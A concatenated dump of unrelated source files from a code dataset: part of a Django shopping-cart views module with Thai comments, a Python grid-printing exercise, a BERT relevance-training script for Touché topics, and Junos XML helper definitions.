getuser\n\t\taddverify.token = token_code\n\t\taddverify.save()\n\n\t\t#from django.contrib.auth import authenticate, login\n\t\tuser = 
authenticate(username=email, password=password)\n\t\tlogin(request,user) \n\t\t#Auto login\n\n\treturn render(request, 'myapp/register.html')\n\n\ndef AddtoCart(request,pid):\n\t# localhost:8000/addtocart/pid\n\t# or {% url 'addtocart-page' pd.id %}\n\tprint('CURRENT USER:',request.user)\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcheck = Allproduct.objects.get(id=pid)\n\ttry:\n\t\t#กรณีที่สินค้ามีซ้ำ\n\t\tnewcart = Cart.objects.get(user=user,productid=str(pid))\n\t\t#print('EXISTS: ', pcheck.exists())\n\t\tnewquan = newcart.quantity + 1\n\t\tnewcart.quantity = newquan\n\t\tcalculate = newcart.price * newquan\n\t\tnewcart.total = calculate\n\t\tnewcart.save()\n\n\t\t#update items amount in cart\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\n\t\treturn redirect('allproduct-page')\n\n\texcept:\n\t\tnewcart = Cart()\n\t\tnewcart.user = user\n\t\tnewcart.productid = pid\n\t\tnewcart.productname = check.name\n\t\tnewcart.price = int(check.price)\n\t\tnewcart.quantity = 1\n\t\tcalculate = int(check.price) * 1\n\t\tnewcart.total = calculate\n\t\tnewcart.save()\n\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\n\t\treturn redirect('allproduct-page')\n\n\ndef MyCart(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcontext = {}\n\tif request.method == 'POST':\n\t\t#ใช้สำหรับการลบเท่านั้น\n\t\tdata =request.POST.copy()\n\t\tproductid = data.get('productid')\n\t\tprint('PID',productid)\n\t\titem = Cart.objects.get(user=user,productid=productid)\n\t\titem.delete()\n\t\tcontext['status'] = 'delete'\n\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\n\tmycart = Cart.objects.filter(user=user)\n\tcount = sum([ c.quantity for c in mycart])\n\ttotal = sum([ c.total for c in mycart])\n\n\tcontext['mycart'] = mycart\n\tcontext['count'] = count\n\tcontext['total'] = total\n\n\n\treturn render(request, 'myapp/mycart.html',context)\n\ndef MyCartEdit(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcontext = {}\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\t#print(data)\n\t\tif data.get('clear') == 'clear':\n\t\t\tprint(data.get('clear'))\n\t\t\tCart.objects.filter(user=user).delete()\n\t\t\tupdatequan = Profile.objects.get(user=user)\n\t\t\tupdatequan.cartquan = 0\n\t\t\tupdatequan.save()\n\t\t\treturn redirect('mycart-page')\n\t\t\n\t\teditlist = []\n\t\tfor k,v in data.items(): \n\t\t\t#print([k,v])\n\t\t\tif k[:2] == 'pd':\n\t\t\t\tpid = int(k.split('_')[1])\n\t\t\t\tdt = [pid,int(v)]\n\t\t\t\teditlist.append(dt)\n\t\t#print('EDITLIST:', editlist) #[[productID,quan]]\n\n\t\tfor ed in editlist:\n\t\t\tedit = Cart.objects.get(productid=ed[0],user=user)#productid\n\t\t\tedit.quantity = ed[1] #quantity\n\t\t\tcalculate = edit.price * ed[1]\n\t\t\tedit.total = calculate\n\t\t\tedit.save()\n\n\n\t\tcount = Cart.objects.filter(user=user)\n\t\tcount = sum([ c.quantity for c in count])\n\t\tupdatequan = Profile.objects.get(user=user)\n\t\tupdatequan.cartquan = count\n\t\tupdatequan.save()\n\t\treturn 
redirect('mycart-page')\n\t\t\n\n\tmycart = Cart.objects.filter(user=user)\n\tcontext['mycart'] = mycart\n\n\n\treturn render(request, 'myapp/mycartedit.html',context)\n\ndef Checkout(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\tname = data.get('name')\n\t\ttel = data.get('tel')\n\t\taddress = data.get('address')\n\t\tshipping = data.get('shipping')\n\t\tpayment = data.get('payment')\n\t\tother = data.get('other')\n\t\tpage = data.get('page')\n\t\tif page == 'information':\n\t\t\tcontext = {}\n\t\t\tcontext['name'] = name\n\t\t\tcontext['tel'] = tel\n\t\t\tcontext['address'] = address\n\t\t\tcontext['shipping'] = shipping\n\t\t\tcontext['payment'] = payment\n\t\t\tcontext['other'] = other\n\n\t\t\tmycart = Cart.objects.filter(user=user)\n\t\t\tcount = sum([ c.quantity for c in mycart])\n\t\t\ttotal = sum([ c.total for c in mycart])\n\n\t\t\tcontext['mycart'] = mycart\n\t\t\tcontext['count'] = count\n\t\t\tcontext['total'] = total\n\n\t\t\treturn render(request, 'myapp/checkout2.html', context)\n\n\t\tif page == 'confirm':\n\t\t\tprint('Confirm')\n\t\t\tprint(data)\n\t\t\tmycart = Cart.objects.filter(user=user)\n\t\t\t# generate order no. and save to Order Models\n\t\t\t# id = OD 0007 2020 09 03 22 00 30\n\t\t\t# id = OD 0230 20200903220030\n\t\t\tmid = str(user.id).zfill(4)\n\t\t\tdt = datetime.now().strftime('%Y%m%d%H%M%S')\n\t\t\torderid = 'OD'+ mid + dt\n\t\t\tproductorder = ''\n\t\t\tproducttotal = 0\n\n\t\t\tfor pd in mycart: \n\t\t\t\torder = OrderList()\n\t\t\t\torder.orderid = orderid\n\t\t\t\torder.productid = pd.productid\n\t\t\t\torder.productname = pd.productname\n\t\t\t\torder.price = pd.price\n\t\t\t\torder.quantity = pd.quantity\n\t\t\t\torder.total = pd.total\n\t\t\t\torder.save()\n\t\t\t\tproductorder = productorder + '- {}\\n'.format(pd.productname)#รายการสินค้า\n\t\t\t\tproducttotal += pd.total\n\n\t\t\t\n\t\t\t# Send to LINE Notify in Group\n\t\t\ttexttoline = 'ODID: {}\\n---\\n{}ยอดรวม: {:,.2f} บาท\\n ({})'.format(orderid,productorder,producttotal,name)\n\t\t\t# เช็คยอดสินค้าว่ามากกว่า 10000 หรือไม่หากจริงจะส่งสติกเกอร์ไปด้วย\n\t\t\tif producttotal > 10000:\n\t\t\t\tmessenger.sticker(14,1,texttoline)\n\t\t\telse:\n\t\t\t\tmessenger.sendtext(texttoline)\n\n\n\t\t\t# save product in cart to OrderProduct models\n\t\t\t# creat order pending\n\t\t\todp = OrderPending()\n\t\t\todp.orderid = orderid\n\t\t\todp.user = user\n\t\t\todp.name = name\n\t\t\todp.tel = tel\n\t\t\todp.address = address\n\t\t\todp.shipping = shipping\n\t\t\todp.payment = payment\n\t\t\todp.other = other\n\t\t\todp.save()\n\n\t\t\t# clear cart\n\t\t\tCart.objects.filter(user=user).delete()\n\t\t\tupdatequan = Profile.objects.get(user=user)\n\t\t\tupdatequan.cartquan = 0\n\t\t\tupdatequan.save()\n\t\t\treturn redirect('mycart-page')\n\n\treturn render(request, 'myapp/checkout1.html')\n\n# redirect to order list page\ndef OrderListPage(request):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\tcontext = {}\n\torder = OrderPending.objects.filter(user=user)\n\t'''\n\t-order\n\t\t-order id: OD000220201202131342\n\t\t-user:\n\t\t-name: ผู้รับ\n\t'''\n\tfor od in order:\n\t\torderid = od.orderid\n\t\todlist = OrderList.objects.filter(orderid=orderid)\n\t\t'''\n\t\t\t-odlist\n\t\t\t-object (1)\n\t\t\t\t-orderid: OD1033134\n\t\t\t\t-product: ทุเรียน\n\t\t\t\t-total: 500\n\t\t\t-object (2)\n\t\t\t\t-orderid: OD1033134\n\t\t\t\t-product: กล้วย\n\t\t\t\t-total: 
300\n\t\t\t-object (3)\n\t\t\t\t-orderid: OD1033134\n\t\t\t\t-product: ส้ม\n\t\t\t\t-total: 200\n\n\t\t'''\n\t\t# total = summation from orderlist sum([500,300,200])\n\t\ttotal = sum([c.total for c in odlist])\n\t\tod.total = total\n\t\t# สั่งนับ order ทั้งหมดมีจำนวนกี่ชิ้น\n\t\tcount = sum([c.quantity for c in odlist])\n\n\t\tif od.shipping == 'ems':\n\t\t\tshipcost = sum([50 if i == 0 else 10 for i in range(count)])\n\t\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\t\telse:\n\t\t\tshipcost = sum([35 if i == 0 else 10 for i in range(count)])\n\n\t\tif od.payment == 'cod':\n\t\t\tshipcost += 20 # shipcost = shipcost + 20 for 'COD'\n\t\tod.shipcost = shipcost\n\n\t\n\tcontext['allorder'] = order\n\n\treturn render(request, 'myapp/orderlist.html',context)\n\ndef AllOrderListPage(request):\n\t\n\tcontext = {}\n\torder = OrderPending.objects.all()\n\n\n\tfor od in order:\n\t\torderid = od.orderid\n\t\todlist = OrderList.objects.filter(orderid=orderid)\n\t\ttotal = sum([ c.total for c in odlist])\n\t\tod.total = total\n\n\t\tcount = sum([ c.quantity for c in odlist])\n\n\t\tif od.shipping == 'ems':\n\t\t\tshipcost = sum([ 50 if i == 0 else 10 for i in range(count)])\n\t\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\t\telse:\n\t\t\tshipcost = sum([ 35 if i == 0 else 10 for i in range(count)])\n\n\t\tif od.payment == 'cod':\n\t\t\tshipcost += 20 # shipcost = shipcost + 20\n\t\tod.shipcost = shipcost\n\n\tpaginator = Paginator(order,5)\n\tpage = request.GET.get('page') # http://localhost:8000/allorderlist/?page=\n\torder = paginator.get_page(page)\n\tcontext['allorder'] = order\n\t\n\treturn render(request, 'myapp/allorderlist.html',context)\n\ndef UploadSlip(request,orderid):\n\tprint('order ID:',orderid)\n\n\tif request.method == 'POST' and request.FILES['slip']:\n\t\tdata = request.POST.copy()\n\t\tsliptime = data.get('sliptime')\n\n\t\tupdate = OrderPending.objects.get(orderid=orderid)\n\t\tupdate.sliptime = sliptime\n\t\t##########Save ImageSlip#########\n\t\tfile_image = request.FILES['slip']\n\t\tfile_image_name = request.FILES['slip'].name.replace(' ','')\n\t\tprint('FILE_IMAGE:',file_image)\n\t\tprint('IMAGE_NAME:',file_image_name)\n\t\tfs = FileSystemStorage()\n\t\tfilename = fs.save(file_image_name,file_image)\n\t\tupload_file_url = fs.url(filename)\n\t\tupdate.slip = upload_file_url[6:]\n\t\t#################################\n\t\tupdate.save()\n\n\n\todlist = OrderList.objects.filter(orderid=orderid)\n\ttotal = sum([c.total for c in odlist])\n\toddetail = OrderPending.objects.get(orderid=orderid)\n\t# สั่งนับ order ทั้งหมดมีจำนวนกี่ชิ้น\n\tcount = sum([c.quantity for c in odlist])\n\n\tif oddetail.shipping == 'ems':\n\t\tshipcost = sum([50 if i == 0 else 10 for i in range(count)])\n\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\telse:\n\t\tshipcost = sum([35 if i == 0 else 10 for i in range(count)])\n\n\tif oddetail.payment == 'cod':\n\t\tshipcost += 20 # shipcost = shipcost + 20 for 'COD'\n\t\n\tcontext= {'orderid':orderid,\n\t\t\t 'total':total,\n\t\t\t 'shipcost':shipcost,\n\t\t\t 'grandtotal':total+shipcost,\n\t\t\t 'oddetail':oddetail,\n\t\t\t 'count':count}\n\t\n\treturn render(request, 'myapp/uploadslip.html',context)\n\ndef UpdatePaid(request,orderid,status):\n\t\t\n\tif request.user.profile.usertype != 'admin':\n\t\treturn redirect('home-page')\n\t\n\torder = OrderPending.objects.get(orderid=orderid)\n\tif status == 'confirm':\n\t\torder.paid = 
True\n\telif status == 'cancel':\n\t\torder.paid = False\n\torder.save()\n\treturn redirect('allorderlist-page')\n\ndef UpdateTracking(request,orderid):\n\tif request.user.profile.usertype != 'admin':\n\t\treturn redirect('home-page')\n\t\t\n\tif request.method == 'POST':\n\t\torder = OrderPending.objects.get(orderid=orderid)\n\t\tdata = request.POST.copy()\n\t\ttrackingnumber = data.get('trackingnumber')\n\t\torder.trackingnumber = trackingnumber\n\t\torder.save()\n\t\treturn redirect('allorderlist-page')\n\t\t\n\torder = OrderPending.objects.get(orderid=orderid)\n\todlist = OrderList.objects.filter(orderid=orderid)\n\t#### shipcost calculate\n\ttotal = sum([ c.total for c in odlist])\n\torder.total = total\n\n\tcount = sum([ c.quantity for c in odlist])\n\n\tif order.shipping == 'ems':\n\t\tshipcost = sum([ 50 if i == 0 else 10 for i in range(count)])\n\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\telse:\n\t\tshipcost = sum([ 35 if i == 0 else 10 for i in range(count)])\n\n\tif order.payment == 'cod':\n\t\tshipcost += 20 # shipcost = shipcost + 20\n\torder.shipcost = shipcost\n\n\tcontext = {'orderid':orderid,'order':order,'odlist':odlist,'total':total,'count':count}\n\n\treturn render(request, 'myapp/updatetracking.html', context)\n\ndef MyOrder (request,orderid):\n\tusername = request.user.username\n\tuser = User.objects.get(username=username)\n\n\torder = OrderPending.objects.get(orderid=orderid)\n\t#เช็คว่าเป็นของตัวเองไหม?\n\tif user != order.user:\n\t\treturn redirect('allproduct-page')\n\n\todlist = OrderList.objects.filter(orderid=orderid)\n\t#### shipcost calculate\n\ttotal = sum([ c.total for c in odlist])\n\torder.total = total\n\n\tcount = sum([ c.quantity for c in odlist])\n\n\tif order.shipping == 'ems':\n\t\tshipcost = sum([ 50 if i == 0 else 10 for i in range(count)])\n\t\t# shipcost = รวมค่าทั้งหมด (หากเป็นชิ้นแรกค่าส่งจะคิด 50 บาท ชิ้นถัดไปชิ้นละ 10 บาท)\n\telse:\n\t\tshipcost = sum([ 35 if i == 0 else 10 for i in range(count)])\n\n\tif order.payment == 'cod':\n\t\tshipcost += 20 # shipcost = shipcost + 20\n\torder.shipcost = shipcost\n\n\tcontext = {'order':order,'odlist':odlist,'total':total,'count':count}\n\n\treturn render(request, 'myapp/myorder.html', context)","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"450431883","text":"# grid_part_final.py\n#\n# This is the assignment for Lesson2, each part of the exercise is included.\n# As indicated in the exercise, \"Do something reasonable\", I attempted to meet\n# the objectives of the exercise utilizing the demonstrated elements for\n# string manipulation that were provided. The end result is a grid that is\n# printed out with modular functions to aid in the printing & gathering of\n# user input. 
I allowed for the user to indicate the cell size, to indicate\n# the number of columns in the grid, and to also indicate the number of rows.\n#\n# This code isplays a grid of small boxes based on user input for square size & dimensions.\n# Where the user enters a value for x and y, the grid of boxes is x by y in grid size.\n#\n# Coded by LouReis\n#\n# A one by one box looks like the following\n# +-+\n# | |\n# +-+\n\nplus='+'\nminus='-'\nspace=' '\nbar='|'\n\ndef variable_square_row(size,columns):\n#This function prints out a row of variable sized squares.\n var_top=plus+(size*minus)+plus+space\n var_mid=bar+(size*space)+bar+space\n for x in range(0,columns):\n print(var_top, end=\"\")\n print()\n for x in range (0,size):\n for x in range (0,columns):\n print(var_mid,end=\"\")\n print()\n for x in range (0,columns):\n print(var_top, end=\"\")\n print()\n\ndef variable_size_grid(size,columns,rows):\n#This function is to draw out the grid based on size, columns, & rows.\n for x in range (0,rows):\n variable_square_row(size,columns)\n\ndef user_input():\n#This function prompts the user for the square size & grid dimensions.\n print ('This program prints out a grid of squares.')\n size=int(input('Enter the number for square size: '))\n columns=int(input('Enter the number of columns: '))\n rows=int(input('Enter the number of rows: '))\n print('Here is a',columns,'by',rows,'grid:')\n variable_size_grid(size,columns,rows)\n\n#Call the function to prompt the user for the 3 parameters.\nuser_input()\n","sub_path":"students/LouReis/Lesson02/grid_part_final.py","file_name":"grid_part_final.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"355254388","text":"#!/usr/bin/python\nimport gc\nimport logging\nimport multiprocessing\nimport os\nimport subprocess\nimport time\nfrom pathlib import Path\n\nimport requests\nimport re\n\nimport torch\nfrom typing import List\n\nimport wandb\nfrom simpletransformers.classification import ClassificationModel, ClassificationArgs\nimport pandas\nimport xml.etree.ElementTree as ET\n\nfrom auth.auth import Auth\n\nlogging.basicConfig(level=logging.INFO)\ntransformers_logger = logging.getLogger(\"transformers\")\ntransformers_logger.setLevel(logging.WARNING)\n\n\ndef accuracy_score(true_in, pred_in):\n accuracy = 0\n size = len(true_in)\n\n if size == 1:\n true_in = [true_in]\n pred_in = [pred_in]\n\n for true, pred in zip(true_in, pred_in):\n\n if true == 0:\n if pred == 0:\n accuracy = +1\n elif pred == 1:\n accuracy = +0.1\n\n elif true == 1:\n if pred == 1:\n accuracy = +1\n elif pred == 2:\n accuracy = +0.8\n else:\n accuracy = +0.1\n\n else: # true == 2\n if pred == 1:\n accuracy = +0.8\n elif pred == 2:\n accuracy = +1\n\n if accuracy == 0:\n return accuracy\n\n return accuracy / size\n\n\ndef get_titles(file):\n tree = ET.parse(file)\n root = tree.getroot()\n buffer = []\n\n for title in root.iter(\"title\"):\n buffer.append(title.text.strip())\n return buffer\n\n\ndef retrievingFullDocuments(uuid, index):\n url = \"https://www.chatnoir.eu/cache\"\n\n request_data = {\"uuid\": uuid, \"index\": index, \"raw\": \"raw\", \"plain\": \"plain\"}\n\n data = requests.get(url, request_data).text\n data = re.sub(\"<[^>]+>\", \"\", data)\n data = re.sub(\"\\n\", \"\", data)\n data = re.sub(\"&[^;]+;\", \"\", data)\n\n return data\n\n\ndef uuidToText(data: pandas.DataFrame):\n if Path(\"res/UUID-Text.csv\").is_file():\n print(\"[INFO] UUID-Text.csv found. 
Loading...\")\n Documents = pandas.read_csv(\n \"res/UUID-Text.csv\", names=[\"uuid\", \"trec_id\", \"FullText\"]\n )\n else:\n print(\n \"[INFO] UUID-Text.csv not found at './res/touche20-task2-docs-ID-UUID'. Creating ...\"\n )\n fullText = []\n\n print(\"[INFO] Retrieving Documents\")\n size = data.shape[0]\n\n for index, row in data.iterrows():\n uuid = row[\"uuid\"]\n trec_id = row[\"trec_id\"]\n\n for x in range(10): #\n try:\n buffer = uuid, trec_id, retrievingFullDocuments(uuid, \"cw12\")\n fullText.append(buffer)\n str_error = None\n except Exception as str_error:\n pass\n\n if str_error:\n time.sleep(10)\n if x == 9:\n print(\"[ERROR] Cannot retrieve Documents. Exiting ...\")\n exit(1)\n else:\n break\n\n if index % 100 == 0:\n print(\"[PROGRESS] \", index, \" of \", size)\n\n Documents = pandas.DataFrame(fullText, columns=[\"uuid\", \"trec_id\", \"FullText\"])\n print(\"[INFO] Saving UUID-Text.csv\")\n Documents.to_csv(path_or_buf=\"./res/UUID-Text.csv\", index=False)\n\n return pandas.merge(Documents, data, how=\"inner\", on=[\"trec_id\", \"uuid\"])\n\n\ndef split_data(\n data: pandas.DataFrame, testTopicID\n) -> (pandas.DataFrame, pandas.DataFrame, List[float]):\n\n frames = []\n if isinstance(testTopicID, int):\n test_df = pandas.DataFrame(data.loc[data[\"TopicID\"] == testTopicID])\n else:\n for i in testTopicID:\n buffer = data.loc[data[\"TopicID\"] == i]\n frames.append(buffer)\n\n test_df = pandas.concat(frames)\n\n train_df = pandas.concat([data, test_df]).drop_duplicates(keep=False)\n\n train_df = train_df[[\"Topic\", \"FullText\", \"Score\"]]\n train_df.rename(\n columns={\"Topic\": \"text_a\", \"FullText\": \"text_b\", \"Score\": \"labels\"},\n inplace=True,\n )\n test_df = test_df[[\"Topic\", \"FullText\", \"Score\"]]\n test_df.rename(\n columns={\"Topic\": \"text_a\", \"FullText\": \"text_b\", \"Score\": \"labels\"},\n inplace=True,\n )\n\n # calculating pos_weights based on trainings data\n pos_weights = train_df[\"labels\"].value_counts(normalize=True).sort_index()\n logging.info(\"Frequencies are:\\n {}\".format(pos_weights.to_string()))\n pos_weights = pos_weights.tolist()\n pos_weights = [1 - element for element in pos_weights]\n logging.info(\"Pos_weights are:\\n{}\".format(\" \".join(map(str, pos_weights))))\n\n return train_df, test_df, pos_weights\n\n\ndef train(\n train_df: pandas.DataFrame,\n test_df: pandas.DataFrame,\n save_dir: str,\n project_name: str,\n pos_weights: List[float] = None,\n testTopicID: int = None,\n use_custom_accuracy: bool = False,\n use_early_stopping: bool = False,\n freeze_encoder: bool = True,\n):\n\n if testTopicID is None:\n save_path = Path(save_dir) / Path(project_name) / Path(\"Topic\" + \"undefined\")\n else:\n save_path = (\n Path(save_dir) / Path(project_name) / Path(\"Topic\" + str(testTopicID))\n )\n\n model_args = ClassificationArgs()\n model_args.num_train_epochs = 30\n model_args.reprocess_input_data = True\n model_args.overwrite_output_dir = True\n model_args.wandb_project = project_name\n model_args.save_eval_checkpoints = True\n model_args.save_model_every_epoch = False\n model_args.save_steps = -1\n model_args.output_dir = save_path\n model_args.sliding_window = True\n model_args.learning_rate = 1e-9\n model_args.train_batch_size = 4\n model_args.eval_batch_size = 4\n\n if use_early_stopping:\n model_args.use_early_stopping = True\n model_args.early_stopping_delta = 0.01\n model_args.early_stopping_metric = \"mcc\"\n model_args.early_stopping_metric_minimize = False\n model_args.early_stopping_patience = 3\n 
model_args.evaluate_during_training_steps = 1000\n\n # Freeze encoder Layers\n if freeze_encoder:\n model_args.train_custom_parameters_only = True\n model_args.custom_parameter_groups = [\n {\"params\": [\"classifier.weight\", \"classifier.bias\"], \"lr\": 1e-5}\n ]\n\n # Create a ClassificationModel\n\n if pos_weights is None:\n model = ClassificationModel(\n \"bert\",\n \"bert-base-cased\",\n use_cuda=torch.cuda.is_available(),\n num_labels=3,\n args=model_args,\n )\n else:\n model = ClassificationModel(\n \"bert\",\n \"bert-base-cased\",\n use_cuda=torch.cuda.is_available(),\n num_labels=3,\n weight=pos_weights,\n args=model_args,\n )\n\n # Train the model\n logging.info(\"Starting training\")\n print(model.get_named_parameters())\n gpu_lock.acquire()\n\n if use_custom_accuracy:\n model.train_model(train_df, eval_df=test_df, acc=accuracy_score)\n else:\n print(1)\n # model.train_model(train_df, eval_df=test_df)\n\n # Evaluate the model\n logging.info(\"Evaluating the model\")\n save = save_path / \"hanging-1\"\n save.mkdir(parents=True, exist_ok=True)\n\n if use_custom_accuracy:\n result, model_outputs, wrong_predictions = model.eval_model(\n test_df, acc=accuracy_score\n )\n else:\n print(1)\n # result, model_outputs, wrong_predictions = model.eval_model(test_df)\n\n save_path = save_path / \"data\"\n save_path.mkdir(parents=True, exist_ok=True)\n output = []\n save = save_path / \"hanging0\"\n save.mkdir(parents=True, exist_ok=True)\n\n for index, row in test_df.iterrows():\n predictions, raw_outputs = model.predict([[row[\"text_a\"], row[\"text_b\"]]])\n\n output.append(predictions[0])\n\n save = save_path / \"hanging1\"\n save.mkdir(parents=True, exist_ok=True)\n logging.info(\"Saving train and test data\")\n test_df[\"predictions\"] = output\n train_df.to_csv(path_or_buf=save_path / \"train.csv\", index=True)\n test_df.to_csv(path_or_buf=save_path / \"test.csv\", index=True)\n logging.info(\"Finisched\")\n save = save_path / \"hanging2\"\n save.mkdir(parents=True, exist_ok=True)\n\n\ndef use_bert(**kwargs):\n run = wandb.init(\n project=kwargs.get(\"project_name\"),\n notes=\"Test-Topic : \" + str(kwargs.get(\"testTopicID\")),\n reinit=True,\n )\n\n train(**kwargs)\n run.finish()\n if torch.cuda.is_available():\n torch.cuda.empty_cache()\n gc.collect()\n\n\nif __name__ == \"__main__\":\n\n topics = Path(\"./res/topics-task-2.xml\")\n qrels = Path(\"./res/touche2020-task2-relevance-withbaseline.qrels\")\n ID_UUID = Path(\"./res/touche20-task2-docs-ID-UUID\")\n save_dir = Path(\"./saves/\")\n name = \"other\"\n\n current_dir = Path.cwd()\n subprocess.call([\"chmod\", \"-R\", \"777\", current_dir])\n topics = current_dir / topics\n qrels = current_dir / qrels\n ID_UUID = current_dir / ID_UUID\n save_dir = current_dir / save_dir\n auth = Auth(current_dir.parent)\n keyChatNoir = auth.get_key(\"WandB\")\n logging.basicConfig(\n filename=current_dir / \"run.log\", encoding=\"utf-8\", level=logging.DEBUG\n )\n\n topics = get_titles(topics)\n id = 1\n topic_df = []\n for topic in topics:\n buffer = id, topic\n topic_df.append(buffer)\n id = id + 1\n\n topic_df = pandas.DataFrame(topic_df, columns=[\"TopicID\", \"Topic\"])\n qrels = pandas.read_csv(\n qrels, sep=\" \", names=[\"TopicID\", \"Spacer\", \"trec_id\", \"Score\"]\n )\n IDS = pandas.read_csv(ID_UUID, names=[\"uuid\", \"trec_id\"])\n buffer = pandas.merge(IDS, qrels, how=\"inner\", on=[\"trec_id\"])\n buffer = pandas.merge(buffer, topic_df, how=\"inner\", on=[\"TopicID\"])\n data = uuidToText(buffer)\n\n WandBKey = 
auth.get_key(\"WandB\")\n os.environ[\"WANDB_API_KEY\"] = WandBKey\n multiprocessing.set_start_method(\"spawn\")\n\n # prepare first datasets\n gpu_lock = multiprocessing.Lock()\n train_df, test_df, pos_weights = split_data(data, 1)\n p_old = multiprocessing.Process(\n target=use_bert,\n kwargs={\n \"train_df\": train_df,\n \"test_df\": test_df,\n \"pos_weights\": pos_weights,\n \"testTopicID\": i,\n \"save_dir\": save_dir,\n \"project_name\": name,\n },\n )\n\n for i in range(30, 51):\n p_new = multiprocessing.Process(\n target=use_bert,\n kwargs={\n \"train_df\": train_df,\n \"test_df\": test_df,\n \"pos_weights\": pos_weights,\n \"testTopicID\": i,\n \"save_dir\": save_dir,\n \"project_name\": name,\n },\n )\n p_new.start()\n train_df, test_df, pos_weights = split_data(data, i + 1)\n p_old.join()\n gpu_lock.release()\n\n gc.collect()\n use_bert(\n kwargs={\n \"data\": data,\n \"testTopicID\": i,\n \"save_dir\": save_dir,\n \"project_name\": name,\n }\n )\n print(i)\n if torch.cuda.is_available():\n torch.cuda.empty_cache()\n gc.collect()\n os.chmod(current_dir, 0o777)\n","sub_path":"src/scores/Bert_Docker/TrainAndEvaluate.py","file_name":"TrainAndEvaluate.py","file_ext":"py","file_size_in_byte":11181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"314313687","text":"# jxml.py\n\n\"\"\"\n These are Junos XML 'helper' definitions use for generic XML processing\n\n .DEL to delete an item\n .REN to rename an item, requires the use of NAME()\n\n .INSERT(<'before'|'after'>) to reorder an item, requires the use of NAME() \n .BEFORE to reorder an item before another, requires the use of NAME()\n .AFTER to reorder an item after another, requires the use of NAME()\n\n .NAME(name) to assign the name attribute\n\n\"\"\"\n\nDEL = {'delete': 'delete'} # Junos XML resource delete\nREN = {'rename': 'rename'} # Junos XML resource rename\nACTIVATE = {'active': 'active'} # activate resource\nDEACTIVATE = {'inactive': 'inactive'} # deactivate resource\nREPLACE = {'replace': 'replace'} # replace elements\n\ndef NAME(name): return { 'name': name }\ndef INSERT(cmd): return {'insert': cmd}\n\nBEFORE = {'insert': 'before'}\nAFTER = {'insert': 'after'}\n\n# used with to load only the object identifiers and \n# not all the subsequent configuration\n\nNAMES_ONLY = {'recurse': \"false\"}\n\n# for , attributes to retrieve from apply-groups\nINHERIT = {'inherit': 'inherit'}\nINHERIT_GROUPS = {'inherit':'inherit', 'groups':'groups'}\nINHERIT_DEFAULTS = {'inherit':'defaults', 'groups':'groups'}\n\ndef remove_namespaces( xml ):\n for elem in xml.getiterator():\n i = elem.tag.find('}')\n if i > 0: elem.tag = elem.tag[i+1:]\n return xml\n\ndef rpc_error( rpc_xml ):\n \"\"\"\n extract the various bits from an element\n into a dictionary\n \"\"\"\n remove_namespaces( rpc_xml )\n\n if 'rpc-reply' == rpc_xml.tag:\n rpc_xml = rpc_xml[0]\n\n def find_strip(x):\n ele = rpc_xml.find(x)\n return ele.text.strip() if None != ele else None\n\n this_err = {}\n this_err['severity'] = find_strip('error-severity')\n this_err['source'] = find_strip('source-daemon')\n this_err['edit_path'] = find_strip('error-path')\n this_err['bad_element'] = find_strip('error-info/bad-element')\n this_err['message'] = find_strip('error-message')\n\n return this_err\n\n\n","sub_path":"lib/jnpr/junos/jxml.py","file_name":"jxml.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"10423832","text":"# -*- 
coding: utf-8 -*- {{{\n# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:\n\n# Copyright (c) 2017, Battelle Memorial Institute\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF 